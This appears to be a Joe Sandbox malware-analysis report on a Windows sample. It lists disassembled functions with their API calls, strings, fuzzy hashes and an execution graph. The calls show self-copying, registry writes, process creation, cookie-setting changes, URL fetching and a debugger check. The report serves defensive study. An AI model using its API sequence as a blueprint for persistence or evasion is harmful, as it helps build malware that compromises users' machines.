                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"$"encrypted"
                  • API String ID: 2525500382-4151690107
                  • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                  • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"$"url"
                  • API String ID: 2525500382-2438671658
                  • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                  • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?), ref: 004095A4
                  • CharLowerW.USER32(?,?,?,?,?,?,?), ref: 004095D8
                  • SysFreeString.OLEAUT32(?), ref: 00409608
                  • SysFreeString.OLEAUT32(?), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer
                  • API String ID: 71445658-938904094
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

                  Execution Graph

                  Execution Coverage:10.3%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:696
                  Total number of Limit Nodes:13
                  execution_graph 4033 405000 4043 405008 4033->4043 4036 40c5b9 SysFreeString 4037 405103 4036->4037 4038 40c5b9 SysFreeString 4037->4038 4039 405109 4038->4039 4040 40c5b9 SysFreeString 4039->4040 4041 405111 4040->4041 4042 40c5b9 SysFreeString 4041->4042 4044 405120 4042->4044 4050 4050f2 4043->4050 4051 40c43d 4043->4051 4047 4050e2 4049 40be3a HeapFree 4047->4049 4049->4050 4060 40c5b9 4050->4060 4063 40bf60 4051->4063 4054 4050ce 4054->4047 4056 40c00b 4054->4056 4055 40be3a HeapFree 4055->4054 4057 40c01a 4056->4057 4059 40c03b 4056->4059 4058 40bde1 3 API calls 4057->4058 4058->4059 4059->4047 4061 40c5c0 SysFreeString 4060->4061 4062 4050fb 4060->4062 4061->4062 4062->4036 4064 40bf72 4063->4064 4065 40bfbf 4064->4065 4067 40bfa7 wvnsprintfW 4064->4067 4068 40bde1 4064->4068 4065->4054 4065->4055 4067->4064 4069 40bdf2 4068->4069 4070 40bde5 4068->4070 4072 40be0c HeapReAlloc 4069->4072 4073 40bdfc HeapAlloc 4069->4073 4071 40be3a HeapFree 4070->4071 4074 40bdec 4071->4074 4072->4074 4073->4074 4074->4064 4075 409000 4077 40900a 4075->4077 4076 409040 4078 409043 SysFreeString 4076->4078 4077->4076 4077->4078 4079 409058 4077->4079 4080 40912b 4078->4080 4081 409091 GetTickCount 4079->4081 4082 40905f 4079->4082 4088 4090ae 4081->4088 4083 40906a SysAllocString 4082->4083 4086 40908f 4082->4086 4083->4082 4084 409108 SysFreeString 4084->4084 4085 40911b SysFreeString 4084->4085 4085->4080 4086->4084 4086->4085 4087 4090c7 SysAllocString 4087->4088 4088->4086 4088->4087 4089 409301 4090 409314 4089->4090 4091 40931f 4090->4091 4092 40933b CharLowerW 4090->4092 4096 409364 4090->4096 4093 409351 4092->4093 4094 409362 SysFreeString 4093->4094 4095 409359 SysFreeString 4093->4095 4094->4096 4095->4091 4096->4091 4097 4093ae SysAllocString SysAllocString 4096->4097 4098 4093d7 SysFreeString SysFreeString 4097->4098 4098->4091 4100 409581 4101 409591 4100->4101 4102 409595 4101->4102 4103 409599 CharLowerW 4101->4103 4104 4095fb 4103->4104 4106 4095b3 4103->4106 4105 40960a SysFreeString 4104->4105 4106->4104 4106->4105 4107 4095d5 CharLowerW 4106->4107 4108 4095df 4107->4108 4109 409605 SysFreeString 4108->4109 4109->4105 4110 409402 4111 409415 4110->4111 4112 409419 4111->4112 4113 409437 SysFreeString 4111->4113 4113->4112 4114 409883 4115 409890 4114->4115 4120 409655 4115->4120 4118 409655 __VEC_memcpy 4119 4098c7 4118->4119 4122 40966d 4120->4122 4121 40970f 4121->4118 4121->4119 4122->4121 4123 40c5d0 __VEC_memcpy 4122->4123 4123->4121 3838 409445 3841 40945a 3838->3841 3839 40945e 3840 4094a0 SysFreeString SysFreeString 3840->3839 3841->3839 3841->3840 3842 40a345 3844 40a352 3842->3844 3843 40a378 3844->3843 3846 40a442 3844->3846 3848 40a245 3844->3848 3846->3843 3856 40a2d9 3846->3856 3849 40a262 _memset 3848->3849 3850 40a2d6 3848->3850 3851 40a270 SysAllocString SysAllocString 3849->3851 3850->3846 3852 40a2b3 3851->3852 3853 40a2c3 SysFreeString SysFreeString 3852->3853 3862 409fb1 3852->3862 3853->3850 3855 40a2c2 3855->3853 3857 40a2f4 3856->3857 3861 40a2f0 3856->3861 3858 40a313 3857->3858 3859 40a2fe GetProcessHeap HeapFree 3857->3859 3860 409c99 11 API calls 3858->3860 3859->3858 3860->3861 3861->3843 3871 40d258 3862->3871 3864 409fbd GetTickCount 3869 409fd3 3864->3869 3865 409fde GetTickCount 3866 409fea Sleep 3865->3866 3868 40a030 3865->3868 3867 409ff2 PeekMessageW 3866->3867 3867->3869 3870 40a005 DispatchMessageW 3867->3870 3868->3855 3869->3865 3869->3868 3870->3867 3871->3864 3498 40b346 3544 40d5b0 3498->3544 3501 40b37e 3528 40b3db 3501->3528 3590 40ac20 RegOpenKeyExW 3501->3590 3505 40b394 GetModuleFileNameW 3598 4069fd RegCreateKeyExW 3505->3598 3510 40b3f2 Sleep 3514 40a786 35 API calls 3510->3514 3511 40b3c5 3602 40a786 3511->3602 3512 40b3ca GetLastError 3512->3511 3516 40b407 GetModuleFileNameW 3514->3516 3518 40ac20 4 API calls 3516->3518 3517 40b45c 3520 40ac20 4 API calls 3517->3520 3529 40b3d8 3518->3529 3521 40b468 3520->3521 3526 407727 54 API calls 3521->3526 3522 40b426 CopyFileW 3523 40b43f 3522->3523 3522->3528 3527 4077f0 CreateProcessW 3523->3527 3524 40b4b9 ExpandEnvironmentStringsW 3524->3528 3525 40b4cf GetModuleFileNameW 3525->3529 3530 40b474 3526->3530 3531 40b44b 3527->3531 3528->3510 3528->3517 3528->3524 3528->3525 3536 40b44c ExitProcess 3528->3536 3539 40b4fe GetLastError 3528->3539 3546 40b2ce OleInitialize 3528->3546 3555 40aafd 3528->3555 3564 40ab7c GetModuleFileNameW CharLowerW 3528->3564 3569 40abd9 3528->3569 3575 407727 3528->3575 3587 4077f0 3528->3587 3529->3522 3529->3528 3533 40b498 GetLastError 3530->3533 3534 40b47a 3530->3534 3531->3536 3535 40b4a3 3533->3535 3537 4077f0 CreateProcessW 3534->3537 3538 40a786 35 API calls 3535->3538 3540 40b486 3537->3540 3541 40b4a8 3538->3541 3542 40a786 35 API calls 3539->3542 3540->3536 3543 40b48b GetLastError 3540->3543 3541->3536 3542->3528 3543->3535 3545 40b353 GetModuleFileNameW 3544->3545 3545->3501 3549 40b2e2 3546->3549 3550 40b325 InternetCloseHandle 3549->3550 3618 407552 3549->3618 3621 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 3549->3621 3626 40ac93 3549->3626 3643 40b096 3549->3643 3673 40a6c9 3550->3673 3556 40d5b0 3555->3556 3557 40ab0a GetCommandLineW 3556->3557 3558 40ab1a 3557->3558 3559 40ab1f 3558->3559 3560 40ac20 4 API calls 3558->3560 3559->3528 3561 40ab30 3560->3561 3561->3559 3562 40ab35 GetModuleFileNameW CharLowerW CharLowerW 3561->3562 3563 40ab73 3562->3563 3563->3559 3565 40abb6 3564->3565 3566 40abc0 GetCommandLineW 3565->3566 3567 40abbb 3565->3567 3568 40abd0 3566->3568 3567->3528 3568->3528 3570 40ac20 4 API calls 3569->3570 3571 40abf2 3570->3571 3572 40abf7 FindFirstFileW 3571->3572 3573 40ac1a 3571->3573 3572->3573 3574 40ac0e FindClose 3572->3574 3573->3528 3574->3573 3576 40d5b0 3575->3576 3577 407731 GetModuleFileNameW 3576->3577 3578 407753 3577->3578 3582 40776d 3577->3582 3579 4075d4 15 API calls 3578->3579 3583 407764 3579->3583 3580 407774 ExpandEnvironmentStringsW 3824 4075d4 CreateFileW 3580->3824 3582->3580 3582->3583 3584 4077a7 GetLastError 3582->3584 3585 4077bc GetLastError 3582->3585 3586 40a786 35 API calls 3582->3586 3583->3528 3584->3582 3585->3582 3586->3582 3834 40d530 3587->3834 3589 407805 CreateProcessW 3589->3528 3591 40ac60 RegOpenKeyExW 3590->3591 3592 40ac4a 3590->3592 3593 40ac78 3591->3593 3594 40ac7c 3591->3594 3836 4069c0 RegQueryValueExW RegCloseKey 3592->3836 3593->3505 3593->3528 3837 4069c0 RegQueryValueExW RegCloseKey 3594->3837 3597 40ac5a 3597->3591 3597->3593 3599 406a30 3598->3599 3600 406a2c 3598->3600 3601 406a39 RegSetValueExW RegCloseKey 3599->3601 3600->3511 3600->3512 3601->3600 3604 40a79c 3602->3604 3605 40a7b3 3602->3605 3603 406d14 2 API calls 3603->3604 3604->3603 3604->3605 3606 40a79e Sleep 3604->3606 3607 406cb5 GetVersionExW 3605->3607 3606->3604 3608 40a83f 3607->3608 3609 4078cb 12 API calls 3608->3609 3610 40a873 3609->3610 3611 40a718 5 API calls 3610->3611 3615 40a87b 3611->3615 3612 40a744 5 API calls 3612->3615 3613 40a894 Sleep 3613->3615 3614 406e69 22 API calls 3614->3615 3615->3612 3615->3613 3615->3614 3616 40a8c7 Sleep 3615->3616 3617 40a8e1 GetProcessHeap HeapFree 3615->3617 3616->3615 3617->3529 3677 40584d 3618->3677 3620 407557 Sleep 3620->3549 3622 4073dd SystemTimeToFileTime SystemTimeToFileTime 3621->3622 3624 407432 3622->3624 3625 40745f SetWaitableTimer WaitForSingleObject CloseHandle 3624->3625 3625->3549 3678 406d14 InternetAttemptConnect 3626->3678 3628 40aca4 3629 40aca9 Sleep 3628->3629 3630 40acbd 3628->3630 3632 406d14 2 API calls 3629->3632 3681 4078cb 3630->3681 3632->3628 3633 40acd4 3690 406cb5 GetVersionExW 3633->3690 3635 40ad09 3692 40a718 3635->3692 3638 40ad71 Sleep 3640 40ad4c 3638->3640 3640->3638 3641 40ad9f Sleep 3640->3641 3642 40adbc 3640->3642 3696 40a744 3640->3696 3700 406e69 3640->3700 3641->3640 3642->3549 3644 40b0a3 3643->3644 3645 40b0bd 3644->3645 3646 40b0cf 3644->3646 3672 40b0ae 3644->3672 3806 407995 3645->3806 3813 407951 3646->3813 3649 40b10d 3651 40b177 InternetClearAllPerSiteCookieDecisions 3649->3651 3652 40b168 InternetSetPerSiteCookieDecisionW 3649->3652 3649->3672 3650 40b0cd 3650->3649 3654 40b0fb GetModuleFileNameW 3650->3654 3653 40b17d 3651->3653 3652->3653 3656 40b186 GetLastError 3653->3656 3657 40b196 3653->3657 3654->3649 3655 40b116 GetCurrentDirectoryW 3654->3655 3655->3649 3658 40a786 35 API calls 3656->3658 3659 40b1b0 CreateThread 3657->3659 3660 40b1e1 3657->3660 3658->3657 3659->3657 3661 40b221 3660->3661 3662 40a786 35 API calls 3660->3662 3664 40b228 CloseHandle 3661->3664 3665 40b23d 3661->3665 3663 40b1f7 3662->3663 3663->3661 3668 40b212 WaitForMultipleObjects 3663->3668 3664->3664 3664->3665 3666 40a6c9 InternetCloseHandle 3665->3666 3667 40b242 InternetClearAllPerSiteCookieDecisions 3666->3667 3669 40b24d 3667->3669 3667->3672 3668->3661 3670 40b261 GetModuleFileNameW 3669->3670 3669->3672 3671 40b27c GetCurrentDirectoryW 3670->3671 3670->3672 3671->3672 3672->3549 3676 40a6cf 3673->3676 3674 40a6fc InternetCloseHandle 3674->3676 3675 40a716 ExitProcess 3676->3674 3676->3675 3677->3620 3679 406d22 3678->3679 3680 406d26 InternetOpenW 3678->3680 3679->3628 3680->3628 3712 407e2b 3681->3712 3684 407903 3684->3633 3686 4078ec 3686->3684 3687 4078f4 3686->3687 3724 407d61 3687->3724 3689 407900 3689->3684 3691 406cf6 3690->3691 3691->3635 3693 40a722 3692->3693 3694 40a739 3693->3694 3736 4079ff 3693->3736 3694->3640 3697 40a75d 3696->3697 3698 40a76e 3697->3698 3699 4079ff 5 API calls 3697->3699 3698->3640 3699->3698 3701 40d5b0 3700->3701 3702 406e76 GetTickCount 3701->3702 3703 406e92 3702->3703 3742 407b4e 3703->3742 3705 406f49 3751 409c99 3705->3751 3709 407017 3709->3640 3710 406ff4 3710->3709 3767 407a3c 3710->3767 3713 407e3d 3712->3713 3714 407e4e SetFilePointer ReadFile 3712->3714 3730 407cd7 3713->3730 3715 4078dd 3714->3715 3718 407e7e 3714->3718 3715->3684 3719 40782a GetModuleFileNameW CreateFileW 3715->3719 3717 407e44 3717->3714 3717->3715 3718->3715 3720 407871 GetFileTime CloseHandle 3719->3720 3721 407888 GetTickCount 3719->3721 3722 4078b0 3720->3722 3723 407893 3721->3723 3722->3686 3723->3722 3725 407d70 3724->3725 3728 407d77 3724->3728 3726 407cd7 3 API calls 3725->3726 3726->3728 3727 407d81 3727->3689 3728->3727 3729 407dfa SetFilePointer WriteFile 3728->3729 3729->3689 3731 40d5b0 3730->3731 3732 407ce4 GetModuleFileNameW 3731->3732 3733 407d0d GetCurrentDirectoryW 3732->3733 3734 407d00 3732->3734 3733->3734 3735 407d36 CreateFileW 3734->3735 3735->3717 3739 407908 3736->3739 3738 407a05 3738->3693 3740 407e2b 5 API calls 3739->3740 3741 407919 3740->3741 3741->3738 3777 407267 3742->3777 3744 407b63 3745 407e2b 5 API calls 3744->3745 3746 407b83 3744->3746 3745->3746 3747 407c6b 3746->3747 3782 40bcb4 3746->3782 3792 40bd55 3747->3792 3752 409ca6 3751->3752 3753 409cbb InternetOpenUrlW 3752->3753 3754 409cdf GetProcessHeap HeapAlloc 3753->3754 3755 406fe2 3753->3755 3754->3755 3756 409d5b InternetReadFile 3754->3756 3755->3709 3763 406e00 3755->3763 3757 409d79 GetProcessHeap HeapAlloc 3756->3757 3758 409d0b 3756->3758 3759 409d92 GetProcessHeap HeapFree 3757->3759 3758->3756 3758->3757 3760 409d1f GetProcessHeap HeapReAlloc 3758->3760 3762 40c5d0 __VEC_memcpy 3758->3762 3759->3755 3760->3755 3760->3758 3762->3758 3764 406e12 3763->3764 3765 40c5d0 __VEC_memcpy 3764->3765 3766 406e21 3765->3766 3766->3710 3768 407a4f 3767->3768 3769 40c5d0 __VEC_memcpy 3768->3769 3776 407b42 3768->3776 3770 407a7d 3769->3770 3771 407267 3 API calls 3770->3771 3770->3776 3772 407b17 3771->3772 3773 407267 3 API calls 3772->3773 3774 407b20 3773->3774 3775 407d61 5 API calls 3774->3775 3775->3776 3776->3709 3778 407284 3777->3778 3779 407278 GetSystemTime 3777->3779 3780 40728b SystemTimeToFileTime SystemTimeToFileTime 3778->3780 3779->3780 3781 4072e8 __aulldiv 3780->3781 3781->3744 3784 40bcd3 3782->3784 3783 40bd17 3785 40bd3a 3783->3785 3788 40b51c __VEC_memcpy 3783->3788 3784->3783 3798 40c5d0 3784->3798 3786 40bd4d 3785->3786 3789 40c5d0 __VEC_memcpy 3785->3789 3786->3747 3788->3783 3789->3786 3793 40bd5c 3792->3793 3793->3793 3794 40bd9e 3793->3794 3795 40bcb4 __VEC_memcpy 3793->3795 3796 40bcb4 __VEC_memcpy 3794->3796 3795->3794 3797 407c7c 3796->3797 3797->3705 3799 40c5e8 3798->3799 3800 40c60f __VEC_memcpy 3799->3800 3801 40bcf9 3799->3801 3800->3801 3801->3786 3802 40b51c 3801->3802 3803 40b543 3802->3803 3804 40b552 3802->3804 3805 40c5d0 __VEC_memcpy 3803->3805 3804->3783 3805->3804 3811 4079a2 3806->3811 3807 4079f1 3808 407951 36 API calls 3807->3808 3809 4079fc 3808->3809 3809->3650 3810 407e2b 5 API calls 3810->3811 3811->3807 3811->3810 3818 40791c 3811->3818 3815 407965 3813->3815 3814 407e2b 5 API calls 3814->3815 3815->3814 3816 40798e 3815->3816 3817 40791c 36 API calls 3815->3817 3816->3650 3817->3815 3819 407d61 5 API calls 3818->3819 3820 407930 3819->3820 3821 407939 GetLastError 3820->3821 3822 407949 3820->3822 3823 40a786 35 API calls 3821->3823 3822->3811 3823->3822 3825 40760a CreateFileW 3824->3825 3826 407622 3824->3826 3825->3826 3827 40762a GetFileSize GetProcessHeap HeapAlloc 3825->3827 3826->3582 3827->3826 3828 407650 ReadFile 3827->3828 3828->3826 3829 40766a 3828->3829 3829->3826 3830 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 3829->3830 3833 40584d 3830->3833 3832 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 3832->3826 3833->3832 3835 40d53c __VEC_memzero 3834->3835 3835->3589 3836->3597 3837->3593 4124 409a07 4127 409a14 4124->4127 4125 409a92 4126 409a6d SysAllocString 4126->4125 4127->4125 4127->4126 3872 409c49 3873 409c54 SysAllocString 3872->3873 3874 409c6e 3872->3874 3873->3874 4137 409909 4138 409916 4137->4138 4145 409723 4138->4145 4140 409934 4141 409723 __VEC_memcpy 4140->4141 4143 409a02 4140->4143 4142 4099d5 4141->4142 4142->4143 4144 4099de SysAllocString SysAllocString 4142->4144 4144->4143 4146 409733 4145->4146 4147 40c5d0 __VEC_memcpy 4146->4147 4148 409772 4146->4148 4147->4148 4148->4140 4149 40920a 4151 409217 4149->4151 4150 40929f SysAllocString 4151->4150 4152 40d00b IsDebuggerPresent 4157 40d247 4152->4157 4154 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 4155 40d0fb GetCurrentProcess TerminateProcess 4154->4155 4156 40d0f3 ___report_gsfailure 4154->4156 4156->4155 4157->4154 4158 40500c 4170 40500e 4158->4170 4159 4050f2 